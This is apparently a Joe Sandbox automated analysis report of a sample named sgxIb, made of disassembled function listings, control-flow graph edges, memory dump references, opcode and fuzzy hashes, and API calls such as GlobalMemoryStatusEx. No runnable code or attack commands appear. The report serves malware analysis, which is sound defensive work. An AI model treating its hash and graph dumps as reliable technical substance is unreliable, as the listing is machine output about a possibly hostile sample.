                                              • Instruction Fuzzy Hash: F921E4B59002589FDB10CF9AD985ADEFFF8FB48314F14841AE918A3310D379A940CFA5
                                              Function 0302B110 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 475 302b110-302b150 476 302b152-302b155 475->476 477 302b158-302b183 GetModuleHandleW 475->477 476->477 478 302b185-302b18b 477->478 479 302b18c-302b1a0 477->479 478->479
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0302B176
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2252430413.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_3020000_sgxIb.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 84042579178d1535c4c3c3bca0db3f4040afd48684eed8b94c12512dc362daa8
                                              • Instruction ID: 7ca5c8826843df229728ea83c99086c24636bd36d251351b2c1867a0318aface
                                              • Opcode Fuzzy Hash: 84042579178d1535c4c3c3bca0db3f4040afd48684eed8b94c12512dc362daa8
                                              • Instruction Fuzzy Hash: 3B11DFB5C012598FDB10DF9AD844A9EFBF4AB89210F14841AD429B7610C379A545CFA5
                                              Function 0152D3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251778198.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_152d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc8e5d91432a92ddb8cff695020c8284bc2d0f865c8e9936291f9c3ae985ad7e
                                              • Instruction ID: 428e9ed7b0ef481bb17fef9c0e03a04e39c60e9ead2a1c443351452fc4c192f7
                                              • Opcode Fuzzy Hash: dc8e5d91432a92ddb8cff695020c8284bc2d0f865c8e9936291f9c3ae985ad7e
                                              • Instruction Fuzzy Hash: 08213672504204DFDB05DF58C9C0B5ABFB5FB99314F20C569D9090F296C37AE446C6E1
                                              Function 0152D4C4 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251778198.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_152d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 265ab1eb6d5e80f9ce1c439333875df2b9b3f400d74450483e98165be2a20ea0
                                              • Instruction ID: 5f381f8c4ad8564b262fc87e3325ea75a1124f70298964a200eb28c83251983f
                                              • Opcode Fuzzy Hash: 265ab1eb6d5e80f9ce1c439333875df2b9b3f400d74450483e98165be2a20ea0
                                              • Instruction Fuzzy Hash: 8A210372604240DFDB05DF58D9C0F2ABFB5FB89318F20C569E9090F296C37AD456CAA2
                                              Function 018DD01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251990967.00000000018DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_18dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 90d724e2c52473f87a4febfb8043ef17d90c75d57b30e4338e6362a9572fdc8b
                                              • Instruction ID: 43bc4bd4603ac5b2d86918be82787638b594fd60bd026f40b41317c7ec5a3b70
                                              • Opcode Fuzzy Hash: 90d724e2c52473f87a4febfb8043ef17d90c75d57b30e4338e6362a9572fdc8b
                                              • Instruction Fuzzy Hash: 52210071604304DFCB15DF68D980B26BF65EB88314F20C669D90A8B296C33AD907CAA1
                                              Function 018DD1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251990967.00000000018DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_18dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9e617bc8591214e1939def13f71f57cd66e431d5fc4e4fb5d9166c6a44be134
                                              • Instruction ID: b3b2f22e91fc2e1f9f65a80e5c84bd940487ad1c68270ce53905c1bbeba493c8
                                              • Opcode Fuzzy Hash: c9e617bc8591214e1939def13f71f57cd66e431d5fc4e4fb5d9166c6a44be134
                                              • Instruction Fuzzy Hash: 2B21F571544304EFDB05DFA8D9C0F26BB65FB84324F20C66DD9498B296C33AE506CA61
                                              Function 018DD005 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251990967.00000000018DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_18dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9782ce7225c9b07b2ecf72b53d826cf28ca06afb2116f24b7cab96769f66908a
                                              • Instruction ID: 4d46b0f7f5d7a903aed7fe8bbb7d856a5783fda58e0f973b7bff2ad5a6900ba7
                                              • Opcode Fuzzy Hash: 9782ce7225c9b07b2ecf72b53d826cf28ca06afb2116f24b7cab96769f66908a
                                              • Instruction Fuzzy Hash: 852192755093808FDB13CF24D994715BF71EB86314F28C6EAD8498B697C33A990ACB62
                                              Function 0152D3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251778198.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_152d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction ID: 538a559834a934c5bb17b323b53a39b72e00cc3493ca1f1d13152e584d72ad9d
                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction Fuzzy Hash: 0511CD72404280CFDB02CF44D9C4B5ABF71FB85224F24C6A9D9090E256C33AE45ACBA2
                                              Function 0152D4BF Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251778198.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_152d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction ID: 5e7c947b789f4abf4bb0875ece9c5569367ed5d9d5f04f124d811fdd439567c3
                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction Fuzzy Hash: 0E11DF72504280CFDB02CF54D5C4B1ABF71FB88314F24C6A9D9490F256C33AD45ACBA2
                                              Function 018DD1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251990967.00000000018DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_18dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: f855903380dc9efda51c3d48d48727fd75ef4b0f37fb1f9550f79d102a57d17b
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: E511BB75504380DFDB02CF54C5C4B15BFB2FB84324F24C6A9D8498B696C33AE40ACB62
                                              Function 0152D745 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251778198.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_152d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ddc6cde7cee5787b4751237f87533eae5780a80bfb8d641300ea79123db4781c
                                              • Instruction ID: b46c19e20ae32b588096f4589993f32c5459183f91b6f25d7551cba48a0b4da4
                                              • Opcode Fuzzy Hash: ddc6cde7cee5787b4751237f87533eae5780a80bfb8d641300ea79123db4781c
                                              • Instruction Fuzzy Hash: B701AC7200439499E7105E59CD84B56BFECFF47324F1CC929ED194E2C6D27D9841C6B1
                                              Function 0152D744 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2251778198.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_152d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dddb18738c0cbb547aab9a045b1a32fe0cbe960340754c419dc0bbc09e1ae350
                                              • Instruction ID: e6cb633ea7c2be30c3367376557319a69f242c1de5d2e906049bf21c127296a0
                                              • Opcode Fuzzy Hash: dddb18738c0cbb547aab9a045b1a32fe0cbe960340754c419dc0bbc09e1ae350
                                              • Instruction Fuzzy Hash: 9AF062724043949EE7118E1ADC88B66FFA8EF86734F18C45AED485E287C27D9844CAB1

                                              Execution Graph

                                              Execution Coverage:13.7%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:20
                                              Total number of Limit Nodes:5
                                              execution_graph 28031 13c0848 28032 13c084e 28031->28032 28033 13c091b 28032->28033 28035 13c1340 28032->28035 28036 13c1330 28035->28036 28038 13c1343 28035->28038 28036->28032 28037 13c1454 28037->28032 28038->28037 28040 13c80f9 28038->28040 28042 13c8103 28040->28042 28041 13c81b9 28041->28038 28042->28041 28045 6dbfa88 28042->28045 28050 6dbfa78 28042->28050 28046 6dbfa89 28045->28046 28047 6dbfcae 28046->28047 28048 6dbfcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28046->28048 28049 6dbfcd8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28046->28049 28047->28041 28048->28046 28049->28046 28051 6dbfa88 28050->28051 28052 6dbfcae 28051->28052 28053 6dbfcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28051->28053 28054 6dbfcd8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28051->28054 28052->28041 28053->28051 28054->28051

                                              Executed Functions

                                              Function 06DB3580 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 125 6db3580-6db35a1 126 6db35a3-6db35a6 125->126 127 6db35ac-6db35cb 126->127 128 6db3d47-6db3d4a 126->128 137 6db35cd-6db35d0 127->137 138 6db35e4-6db35ee 127->138 129 6db3d4c-6db3d6b 128->129 130 6db3d70-6db3d72 128->130 129->130 131 6db3d79-6db3d7c 130->131 132 6db3d74 130->132 131->126 134 6db3d82-6db3d8b 131->134 132->131 137->138 140 6db35d2-6db35e2 137->140 142 6db35f4-6db360f call 6db316c 138->142 140->142 146 6db361c-6db38f9 142->146 147 6db3611-6db3617 142->147 168 6db3d39-6db3d46 146->168 169 6db38ff-6db39ae 146->169 147->134 178 6db39b0-6db39d5 169->178 179 6db39d7 169->179 181 6db39e0-6db39f3 call 6db3178 178->181 179->181 184 6db39f9-6db3a11 call 6db3184 181->184 185 6db3d20-6db3d2c 181->185 188 6db3a16-6db3a1b 184->188 185->169 186 6db3d32 185->186 186->168 188->185 189 6db3a21-6db3a2b 188->189 189->185 190 6db3a31-6db3a3c 189->190 190->185 191 6db3a42-6db3b18 190->191 203 6db3b1a-6db3b1c 191->203 204 6db3b26-6db3b56 191->204 203->204 208 6db3b58-6db3b5a 204->208 209 6db3b64-6db3b70 204->209 208->209 210 6db3b72-6db3b76 209->210 211 6db3bd0-6db3bd4 209->211 210->211 212 6db3b78-6db3ba2 210->212 213 6db3bda-6db3c16 211->213 214 6db3d11-6db3d1a 211->214 221 6db3bb0-6db3bcd call 6db3190 212->221 222 6db3ba4-6db3ba6 212->222 225 6db3c18-6db3c1a 213->225 226 6db3c24-6db3c32 213->226 214->185 214->191 221->211 222->221 225->226 229 6db3c49-6db3c54 226->229 230 6db3c34-6db3c3f 226->230 233 6db3c6c-6db3c7d 229->233 234 6db3c56-6db3c5c 229->234 230->229 235 6db3c41 230->235 239 6db3c7f-6db3c85 233->239 240 6db3c95-6db3ca1 233->240 236 6db3c5e 234->236 237 6db3c60-6db3c62 234->237 235->229 236->233 237->233 241 6db3c89-6db3c8b 239->241 242 6db3c87 239->242 244 6db3cb9-6db3d0a 240->244 245 6db3ca3-6db3ca9 240->245 241->240 242->240 244->214 246 6db3cab 245->246 247 6db3cad-6db3caf 245->247 246->244 247->244
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465
                                              • Opcode ID: 0f9051b27e9fe6f5cf747e168241653c85d0d1741c2f659c2069e0fae6a0690f
                                              • Instruction ID: a0cb42778cab96ea663eb3140c54dbed0df14f694576a64e0a9f6e3ebb2bcef8
                                              • Opcode Fuzzy Hash: 0f9051b27e9fe6f5cf747e168241653c85d0d1741c2f659c2069e0fae6a0690f
                                              • Instruction Fuzzy Hash: 7C324D30E1061ACFCB15DF79D89459DB7B2FFC9300F21966AD40AA7264EB34AD85CB90
                                              Function 06DB7E98 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 710 6db7e98-6db7eb6 711 6db7eb8-6db7ebb 710->711 712 6db7ebd-6db7ed7 711->712 713 6db7edc-6db7edf 711->713 712->713 714 6db7ee1-6db7eef 713->714 715 6db7ef6-6db7ef9 713->715 726 6db7f3e-6db7f54 714->726 727 6db7ef1 714->727 717 6db7efb-6db7f17 715->717 718 6db7f1c-6db7f1f 715->718 717->718 719 6db7f2c-6db7f2e 718->719 720 6db7f21-6db7f2b 718->720 723 6db7f30 719->723 724 6db7f35-6db7f38 719->724 723->724 724->711 724->726 730 6db7f5a-6db7f63 726->730 731 6db816f-6db8179 726->731 727->715 732 6db817a-6db81af 730->732 733 6db7f69-6db7f86 730->733 736 6db81b1-6db81b4 732->736 740 6db815c-6db8169 733->740 741 6db7f8c-6db7fb4 733->741 738 6db81ba-6db81c9 736->738 739 6db83e9-6db83ec 736->739 750 6db81cb-6db81e6 738->750 751 6db81e8-6db822c 738->751 742 6db840f-6db8412 739->742 743 6db83ee-6db840a 739->743 740->730 740->731 741->740 767 6db7fba-6db7fc3 741->767 745 6db8418-6db8424 742->745 746 6db84bd-6db84bf 742->746 743->742 753 6db842f-6db8431 745->753 747 6db84c1 746->747 748 6db84c6-6db84c9 746->748 747->748 748->736 754 6db84cf-6db84d8 748->754 750->751 761 6db83bd-6db83d3 751->761 762 6db8232-6db8243 751->762 755 6db8449-6db844d 753->755 756 6db8433-6db8439 753->756 765 6db845b 755->765 766 6db844f-6db8459 755->766 763 6db843b 756->763 764 6db843d-6db843f 756->764 761->739 776 6db8249-6db8266 762->776 777 6db83a8-6db83b7 762->777 763->755 764->755 768 6db8460-6db8462 765->768 766->768 767->732 769 6db7fc9-6db7fe5 767->769 773 6db8473-6db84ac 768->773 774 6db8464-6db8467 768->774 780 6db7feb-6db8015 769->780 781 6db814a-6db8156 769->781 773->738 793 6db84b2-6db84bc 773->793 774->754 776->777 787 6db826c-6db8362 call 6db66b8 776->787 777->761 777->762 794 6db801b-6db8043 780->794 795 6db8140-6db8145 780->795 781->740 781->767 843 6db8370 787->843 844 6db8364-6db836e 787->844 794->795 802 6db8049-6db8077 794->802 795->781 802->795 807 6db807d-6db8086 802->807 807->795 809 6db808c-6db80be 807->809 816 6db80c9-6db80e5 809->816 817 6db80c0-6db80c4 809->817 816->781 819 6db80e7-6db813e call 6db66b8 816->819 817->795 818 6db80c6 817->818 818->816 819->781 845 6db8375-6db8377 843->845 844->845 845->777 846 6db8379-6db837e 845->846 847 6db838c 846->847 848 6db8380-6db838a 846->848 849 6db8391-6db8393 847->849 848->849 849->777 850 6db8395-6db83a1 849->850 850->777
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              • Opcode ID: 75c1fbac4f4055dfe40295882213cf7e89c4bd09ec948b66617754cf7db21007
                                              • Instruction ID: 2b2da2eabd9b0f2d15dae1f3cfc3cfe798cda55421bf6df6feab3cc52dd0eff7
                                              • Opcode Fuzzy Hash: 75c1fbac4f4055dfe40295882213cf7e89c4bd09ec948b66617754cf7db21007
                                              • Instruction Fuzzy Hash: 59027C30B002169FDB54DF69D990AAEB7B6FF84314F148529D406EB399DB39EC42CB81
                                              Function 06DB56B0 Relevance: 1.8, Strings: 1, Instructions: 588COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1587 6db56b0-6db56cd 1588 6db56cf-6db56d2 1587->1588 1589 6db570a-6db570d 1588->1589 1590 6db56d4-6db56da 1588->1590 1593 6db570f-6db5711 1589->1593 1594 6db5714-6db5717 1589->1594 1591 6db5893-6db58c3 1590->1591 1592 6db56e0-6db56e8 1590->1592 1613 6db58cd-6db58d0 1591->1613 1592->1591 1595 6db56ee-6db56fb 1592->1595 1593->1594 1596 6db572b-6db572e 1594->1596 1597 6db5719-6db5726 1594->1597 1595->1591 1601 6db5701-6db5705 1595->1601 1598 6db5741-6db5744 1596->1598 1599 6db5730-6db5736 1596->1599 1597->1596 1604 6db5752-6db5755 1598->1604 1605 6db5746-6db574d 1598->1605 1602 6db582d-6db5837 1599->1602 1603 6db573c 1599->1603 1601->1589 1610 6db583e-6db5840 1602->1610 1603->1598 1608 6db5768-6db576b 1604->1608 1609 6db5757-6db575d 1604->1609 1605->1604 1614 6db576d-6db5776 1608->1614 1615 6db5777-6db577a 1608->1615 1611 6db5763 1609->1611 1612 6db5820-6db5823 1609->1612 1617 6db5845-6db5848 1610->1617 1611->1608 1616 6db5828-6db582b 1612->1616 1618 6db58f2-6db58f5 1613->1618 1619 6db58d2-6db58d6 1613->1619 1620 6db578d-6db5790 1615->1620 1621 6db577c-6db5782 1615->1621 1616->1602 1616->1617 1622 6db584a-6db585c 1617->1622 1623 6db5861-6db5864 1617->1623 1626 6db5909-6db590c 1618->1626 1627 6db58f7-6db58fe 1618->1627 1624 6db58dc-6db58e4 1619->1624 1625 6db59c2-6db59d0 1619->1625 1629 6db5798-6db579b 1620->1629 1630 6db5792-6db5793 1620->1630 1621->1590 1628 6db5788 1621->1628 1622->1623 1623->1599 1632 6db586a-6db586d 1623->1632 1624->1625 1631 6db58ea-6db58ed 1624->1631 1655 6db59d2-6db59fc 1625->1655 1656 6db5a00-6db5a01 1625->1656 1635 6db592e-6db5931 1626->1635 1636 6db590e-6db5912 1626->1636 1633 6db59ba-6db59c1 1627->1633 1634 6db5904 1627->1634 1628->1620 1637 6db579d-6db57a1 1629->1637 1638 6db57ac-6db57af 1629->1638 1630->1629 1631->1618 1632->1621 1647 6db5873-6db5875 1632->1647 1634->1626 1641 6db594f-6db5952 1635->1641 1642 6db5933-6db5937 1635->1642 1636->1625 1648 6db5918-6db5920 1636->1648 1639 6db57a7 1637->1639 1640 6db5885-6db5892 1637->1640 1643 6db57b9-6db57bc 1638->1643 1644 6db57b1-6db57b4 1638->1644 1639->1638 1653 6db596a-6db596d 1641->1653 1654 6db5954-6db5965 1641->1654 1642->1625 1650 6db593d-6db5945 1642->1650 1651 6db57be-6db57dd 1643->1651 1652 6db57e2-6db57e5 1643->1652 1644->1643 1657 6db587c-6db587f 1647->1657 1658 6db5877 1647->1658 1648->1625 1649 6db5926-6db5929 1648->1649 1649->1635 1650->1625 1659 6db5947-6db594a 1650->1659 1651->1652 1660 6db57fb-6db57fe 1652->1660 1661 6db57e7-6db57f6 1652->1661 1662 6db596f-6db5976 1653->1662 1663 6db5977-6db597a 1653->1663 1654->1653 1664 6db59fe 1655->1664 1665 6db5a0f-6db5a12 1656->1665 1666 6db5a03-6db5a0a 1656->1666 1657->1588 1657->1640 1658->1657 1659->1641 1671 6db581b-6db581e 1660->1671 1672 6db5800-6db5816 1660->1672 1661->1660 1669 6db597c-6db5980 1663->1669 1670 6db5994-6db5997 1663->1670 1664->1656 1673 6db5cfb-6db5cfe 1665->1673 1674 6db5a18-6db5bac 1665->1674 1666->1665 1669->1625 1680 6db5982-6db598a 1669->1680 1675 6db5999-6db59a3 1670->1675 1676 6db59a8-6db59aa 1670->1676 1671->1612 1671->1616 1672->1671 1678 6db5d00-6db5d13 1673->1678 1679 6db5d16-6db5d19 1673->1679 1739 6db5bb2-6db5bb9 1674->1739 1740 6db5ce5-6db5cf8 1674->1740 1675->1676 1685 6db59ac 1676->1685 1686 6db59b1-6db59b4 1676->1686 1681 6db5d1b-6db5d2c 1679->1681 1682 6db5d33-6db5d36 1679->1682 1680->1625 1688 6db598c-6db598f 1680->1688 1696 6db5d7b-6db5d82 1681->1696 1697 6db5d2e 1681->1697 1690 6db5d38-6db5d49 1682->1690 1691 6db5d50-6db5d53 1682->1691 1685->1686 1686->1613 1686->1633 1688->1670 1699 6db5d5e-6db5d6f 1690->1699 1703 6db5d4b 1690->1703 1691->1674 1695 6db5d59-6db5d5c 1691->1695 1695->1699 1700 6db5d76-6db5d79 1695->1700 1701 6db5d87-6db5d8a 1696->1701 1697->1682 1699->1696 1709 6db5d71 1699->1709 1700->1696 1700->1701 1701->1674 1704 6db5d90-6db5d93 1701->1704 1703->1691 1706 6db5db1-6db5db4 1704->1706 1707 6db5d95-6db5da6 1704->1707 1710 6db5dce-6db5dd1 1706->1710 1711 6db5db6-6db5dc7 1706->1711 1707->1678 1716 6db5dac 1707->1716 1709->1700 1714 6db5ddb-6db5ddd 1710->1714 1715 6db5dd3-6db5dd8 1710->1715 1711->1696 1721 6db5dc9 1711->1721 1718 6db5ddf 1714->1718 1719 6db5de4-6db5de7 1714->1719 1715->1714 1716->1706 1718->1719 1719->1664 1720 6db5ded-6db5df6 1719->1720 1721->1710 1741 6db5bbf-6db5be2 1739->1741 1742 6db5c6d-6db5c74 1739->1742 1751 6db5bea-6db5bf2 1741->1751 1742->1740 1743 6db5c76-6db5ca9 1742->1743 1755 6db5cab 1743->1755 1756 6db5cae-6db5cdb 1743->1756 1752 6db5bf7-6db5c38 1751->1752 1753 6db5bf4 1751->1753 1764 6db5c3a-6db5c4b 1752->1764 1765 6db5c50-6db5c61 1752->1765 1753->1752 1755->1756 1756->1720 1764->1720 1765->1720
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $
                                              • API String ID: 0-3993045852
                                              • Opcode ID: b7be07db9fc3f4d9a2fb1c55df0b2097e00472b6d22e9a4da36f13fe986b5ac2
                                              • Instruction ID: 8b1b7dcce9d837c2fa0f27ccd1f2c94f4c6c5c54485a9dd257ea4c21b7ac9b30
                                              • Opcode Fuzzy Hash: b7be07db9fc3f4d9a2fb1c55df0b2097e00472b6d22e9a4da36f13fe986b5ac2
                                              • Instruction Fuzzy Hash: 7122A275F00215CFDF64DFA8E4806EEBBB2EB84314F208569D54AAB358DA35DC42CB91
                                              Function 06DB6708 Relevance: .8, Instructions: 815COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7bf3108f10e9b2a518478fe5a86796050b1820af59cc57d7e5ae1656b77781af
                                              • Instruction ID: 7804c73d834224600d0e9cc67592e8823a8d55ce4980aeb32816150ca94a06c1
                                              • Opcode Fuzzy Hash: 7bf3108f10e9b2a518478fe5a86796050b1820af59cc57d7e5ae1656b77781af
                                              • Instruction Fuzzy Hash: F5629B34B00205CFDB54DB68D594AADB7F2EF88314F249569E406EB398DB39EC46CB90
                                              Function 06DBADE8 Relevance: 10.4, Strings: 8, Instructions: 390COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 6dbade8-6dbae06 1 6dbae08-6dbae0b 0->1 2 6dbae2e-6dbae31 1->2 3 6dbae0d-6dbae29 1->3 4 6dbae37-6dbae3a 2->4 5 6dbb005-6dbb00e 2->5 3->2 7 6dbae4e-6dbae51 4->7 8 6dbae3c-6dbae49 4->8 9 6dbae91-6dbae9a 5->9 10 6dbb014-6dbb01e 5->10 13 6dbae53-6dbae57 7->13 14 6dbae62-6dbae65 7->14 8->7 11 6dbb01f-6dbb056 9->11 12 6dbaea0-6dbaea4 9->12 28 6dbb058-6dbb05b 11->28 16 6dbaea9-6dbaeac 12->16 13->10 18 6dbae5d 13->18 19 6dbae6f-6dbae72 14->19 20 6dbae67-6dbae6c 14->20 21 6dbaeae-6dbaeb7 16->21 22 6dbaebc-6dbaebe 16->22 18->14 24 6dbae8c-6dbae8f 19->24 25 6dbae74-6dbae87 19->25 20->19 21->22 26 6dbaec0 22->26 27 6dbaec5-6dbaec8 22->27 24->9 24->16 25->24 26->27 27->1 32 6dbaece-6dbaef2 27->32 30 6dbb07e-6dbb081 28->30 31 6dbb05d-6dbb079 28->31 33 6dbb083 call 6dbb3e7 30->33 34 6dbb090-6dbb093 30->34 31->30 50 6dbaef8-6dbaf07 32->50 51 6dbb002 32->51 41 6dbb089-6dbb08b 33->41 37 6dbb0a0-6dbb0a3 34->37 38 6dbb095-6dbb099 34->38 39 6dbb0a9-6dbb0e4 37->39 40 6dbb30c-6dbb30f 37->40 38->39 42 6dbb09b 38->42 52 6dbb0ea-6dbb0f6 39->52 53 6dbb2d7-6dbb2ea 39->53 44 6dbb31c-6dbb31e 40->44 45 6dbb311-6dbb31b 40->45 41->34 42->37 48 6dbb320 44->48 49 6dbb325-6dbb328 44->49 48->49 49->28 54 6dbb32e-6dbb338 49->54 57 6dbaf09-6dbaf0f 50->57 58 6dbaf1f-6dbaf5a call 6db66b8 50->58 51->5 62 6dbb0f8-6dbb111 52->62 63 6dbb116-6dbb15a 52->63 56 6dbb2ec 53->56 64 6dbb2ed 56->64 60 6dbaf13-6dbaf15 57->60 61 6dbaf11 57->61 76 6dbaf5c-6dbaf62 58->76 77 6dbaf72-6dbaf89 58->77 60->58 61->58 62->56 78 6dbb15c-6dbb16e 63->78 79 6dbb176-6dbb1b5 63->79 64->64 80 6dbaf66-6dbaf68 76->80 81 6dbaf64 76->81 88 6dbaf8b-6dbaf91 77->88 89 6dbafa1-6dbafb2 77->89 78->79 85 6dbb1bb-6dbb296 call 6db66b8 79->85 86 6dbb29c-6dbb2b1 79->86 80->77 81->77 85->86 86->53 93 6dbaf93 88->93 94 6dbaf95-6dbaf97 88->94 98 6dbafca-6dbaffb 89->98 99 6dbafb4-6dbafba 89->99 93->89 94->89 98->51 100 6dbafbe-6dbafc0 99->100 101 6dbafbc 99->101 100->98 101->98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
